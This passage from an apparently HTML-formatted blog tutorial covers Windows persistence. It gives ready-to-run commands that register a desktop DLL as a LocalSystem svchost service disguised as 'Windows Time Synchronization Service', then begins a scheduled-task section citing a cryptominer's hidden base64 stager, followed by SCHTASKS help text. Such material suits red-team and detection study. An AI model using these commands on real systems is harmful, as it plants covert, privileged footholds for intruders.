&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;Description&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"Windows Time Synchronization Service"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;DisplayName&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"TimeSyncSrv"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;netsvr&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_MULTI_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Commands for native 64‑bit services:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="kd"&gt;create&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="kd"&gt;binPath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"C:\Windows\System32\svchost.exe -k netsvr"&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;auto&lt;/span&gt; &lt;span class="kd"&gt;obj&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;LocalSystem&lt;/span&gt;
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync\Parameters &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ServiceDll&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_EXPAND_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"C:\Users\hunter\Desktop\localService32.dll"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:64
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;Description&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"Windows Time Synchronization Service"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:64
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;DisplayName&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"TimeSyncSrv"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:64
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;netsvr&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_MULTI_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:64
&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A significant caveat: the &lt;code&gt;reg add&lt;/code&gt; command overwrites existing registry values. Most keys under &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost&lt;/code&gt; are of type &lt;code&gt;REG_MULTI_SZ&lt;/code&gt; (multi‑string). Therefore, one must never write to an existing key, as it holds services essential for system boot; overwriting would cause severe issues. (Hence, the commands above use "netsvr", a key that does not exist by default.)&lt;/p&gt;

&lt;h2&gt;
  
  
  0x04 Scheduled Tasks
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator privileges without UAC reduction, or standard user.&lt;br&gt;&lt;br&gt;
Scheduled tasks constitute another excellent persistence vector. Unlike auto‑start registry keys and services, scheduled tasks offer greater diversity and flexibility in configuration, and their location is relatively concealed (manual inspection requires several additional clicks). For instance, during security service engagements, the notorious "DriverLife" cryptominer employed persistence by creating multiple PowerShell scripts within scheduled tasks, with its stager directly embedded as a base64‑encoded argument in the command line. The input field is quite narrow, and less experienced engineers might easily overlook the trailing content.&lt;/p&gt;

&lt;p&gt;Windows provides the &lt;code&gt;SCHTASKS&lt;/code&gt; command for managing scheduled tasks, with the following options:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/parameter &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="kd"&gt;arguments&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;

&lt;span class="kd"&gt;Description&lt;/span&gt;:
    &lt;span class="kd"&gt;Enables&lt;/span&gt; &lt;span class="kd"&gt;an&lt;/span&gt; &lt;span class="kd"&gt;administrator&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;create&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;delete&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;query&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;change&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;end&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;tasks&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;local&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt;.

&lt;span class="kd"&gt;Parameter&lt;/span&gt; &lt;span class="kd"&gt;List&lt;/span&gt;:
    &lt;span class="na"&gt;/Create         &lt;/span&gt;&lt;span class="kd"&gt;Creates&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;new&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;.
    &lt;span class="na"&gt;/Delete         &lt;/span&gt;&lt;span class="kd"&gt;Deletes&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;s&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.
    &lt;span class="na"&gt;/Query          &lt;/span&gt;&lt;span class="kd"&gt;Displays&lt;/span&gt; &lt;span class="kd"&gt;all&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;tasks&lt;/span&gt;.
    &lt;span class="na"&gt;/Change         &lt;/span&gt;&lt;span class="kd"&gt;Changes&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;properties&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;.
    &lt;span class="na"&gt;/Run            &lt;/span&gt;&lt;span class="kd"&gt;Runs&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;demand&lt;/span&gt;.
    &lt;span class="na"&gt;/End            &lt;/span&gt;&lt;span class="kd"&gt;Stops&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;currently&lt;/span&gt; &lt;span class="kd"&gt;running&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;.
    &lt;span class="na"&gt;/ShowSid        &lt;/span&gt;&lt;span class="kd"&gt;Shows&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;security&lt;/span&gt; &lt;span class="kd"&gt;identifier&lt;/span&gt; &lt;span class="kd"&gt;corresponding&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;name&lt;/span&gt;.
    /&lt;span class="o"&gt;?&lt;/span&gt;              &lt;span class="kd"&gt;Displays&lt;/span&gt; &lt;span class="kd"&gt;this&lt;/span&gt; &lt;span class="nb"&gt;help&lt;/span&gt; &lt;span class="kd"&gt;message&lt;/span&gt;.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For persistence, the &lt;code&gt;Create&lt;/code&gt; parameter is most frequently used. Due to its numerous arguments, the full help text is reproduced below for reference:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/S &lt;/span&gt;&lt;span class="kd"&gt;system&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/U &lt;/span&gt;&lt;span class="kd"&gt;username&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/P &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;]]]]&lt;/span&gt;
    &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;username&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;]]&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="kd"&gt;modifier&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/D &lt;/span&gt;&lt;span class="kd"&gt;day&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
    &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/M &lt;/span&gt;&lt;span class="kd"&gt;months&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/I &lt;/span&gt;&lt;span class="kd"&gt;idletime&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;taskname&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;taskrun&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/ST &lt;/span&gt;&lt;span class="kd"&gt;starttime&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
    &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/RI &lt;/span&gt;&lt;span class="kd"&gt;interval&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="kd"&gt;endtime&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="na"&gt;/DU &lt;/span&gt;&lt;span class="kd"&gt;duration&lt;/span&gt;&lt;span class="o"&gt;}&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/K&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/XML &lt;/span&gt;&lt;span class="kd"&gt;xmlfile&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/V&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="o"&gt;]]&lt;/span&gt;
    &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/SD &lt;/span&gt;&lt;span class="kd"&gt;startdate&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/ED &lt;/span&gt;&lt;span class="kd"&gt;enddate&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/IT &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="na"&gt;/NP&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/Z&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/F&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;

&lt;span class="kd"&gt;Description&lt;/span&gt;:
     &lt;span class="kd"&gt;Allows&lt;/span&gt; &lt;span class="kd"&gt;an&lt;/span&gt; &lt;span class="kd"&gt;administrator&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;local&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt;.

&lt;span class="kd"&gt;Parameter&lt;/span&gt; &lt;span class="kd"&gt;List&lt;/span&gt;:
    &lt;span class="na"&gt;/S   &lt;/span&gt;&lt;span class="kd"&gt;system&lt;/span&gt;        &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;connect&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt;. &lt;span class="kd"&gt;If&lt;/span&gt; &lt;span class="kd"&gt;omitted&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;local&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;used&lt;/span&gt;.
    &lt;span class="na"&gt;/U   &lt;/span&gt;&lt;span class="kd"&gt;username&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;context&lt;/span&gt; &lt;span class="kd"&gt;under&lt;/span&gt; &lt;span class="kd"&gt;which&lt;/span&gt; &lt;span class="kd"&gt;SchTasks&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;should&lt;/span&gt; &lt;span class="kd"&gt;execute&lt;/span&gt;.
    &lt;span class="na"&gt;/P   &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;    &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;given&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;context&lt;/span&gt;. &lt;span class="kd"&gt;Prompts&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;input&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="kd"&gt;omitted&lt;/span&gt;.
    &lt;span class="na"&gt;/RU  &lt;/span&gt;&lt;span class="kd"&gt;username&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="s2"&gt;"run as"&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;account&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;context&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="kd"&gt;under&lt;/span&gt; &lt;span class="kd"&gt;which&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt;. &lt;span class="kd"&gt;For&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt; &lt;span class="kd"&gt;account&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt; &lt;span class="kd"&gt;are&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"NT AUTHORITY\SYSTEM"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="s2"&gt;"SYSTEM"&lt;/span&gt;. &lt;span class="kd"&gt;For&lt;/span&gt; &lt;span class="kd"&gt;v2&lt;/span&gt; &lt;span class="kd"&gt;tasks&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"NT AUTHORITY\LOCALSERVICE"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"NT AUTHORITY\NETWORKSERVICE"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;common&lt;/span&gt; &lt;span class="kd"&gt;SIDs&lt;/span&gt; &lt;span class="kd"&gt;are&lt;/span&gt; &lt;span class="kd"&gt;also&lt;/span&gt; &lt;span class="kd"&gt;available&lt;/span&gt;.
    &lt;span class="na"&gt;/RP  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;    &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="s2"&gt;"run as"&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt;. &lt;span class="kd"&gt;To&lt;/span&gt; &lt;span class="nb"&gt;prompt&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;value&lt;/span&gt; &lt;span class="kd"&gt;must&lt;/span&gt; &lt;span class="kd"&gt;be&lt;/span&gt; &lt;span class="s2"&gt;"*"&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;none&lt;/span&gt;. &lt;span class="kd"&gt;The&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;ignored&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt; &lt;span class="kd"&gt;account&lt;/span&gt;. &lt;span class="kd"&gt;Must&lt;/span&gt; &lt;span class="kd"&gt;be&lt;/span&gt; &lt;span class="kd"&gt;used&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="na"&gt;/XML&lt;/span&gt;.
    &lt;span class="na"&gt;/SC   &lt;/span&gt;&lt;span class="kd"&gt;schedule&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="kd"&gt;frequency&lt;/span&gt;.
                       &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="kd"&gt;types&lt;/span&gt;: &lt;span class="kd"&gt;MINUTE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;HOURLY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;DAILY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;WEEKLY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;MONTHLY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONCE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;.
    &lt;span class="na"&gt;/MO   &lt;/span&gt;&lt;span class="kd"&gt;modifier&lt;/span&gt;      &lt;span class="kd"&gt;Refines&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="nb"&gt;type&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;allow&lt;/span&gt; &lt;span class="kd"&gt;finer&lt;/span&gt; &lt;span class="kd"&gt;control&lt;/span&gt; &lt;span class="kd"&gt;over&lt;/span&gt; &lt;span class="kd"&gt;recurrence&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt; &lt;span class="kd"&gt;are&lt;/span&gt; &lt;span class="kd"&gt;listed&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="s2"&gt;"Modifiers"&lt;/span&gt; &lt;span class="kd"&gt;section&lt;/span&gt; &lt;span class="kd"&gt;below&lt;/span&gt;.
    &lt;span class="na"&gt;/D    &lt;/span&gt;&lt;span class="kd"&gt;days&lt;/span&gt;          &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;day&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;s&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;week&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt;: &lt;span class="kd"&gt;MON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;TUE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;WED&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;THU&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;FRI&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;SAT&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;SUN&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;MONTHLY&lt;/span&gt; &lt;span class="kd"&gt;schedules&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;–31 &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;day&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;month&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;. &lt;span class="kd"&gt;Wildcard&lt;/span&gt; &lt;span class="s2"&gt;"*"&lt;/span&gt; &lt;span class="kd"&gt;specifies&lt;/span&gt; &lt;span class="kd"&gt;all&lt;/span&gt; &lt;span class="kd"&gt;days&lt;/span&gt;.
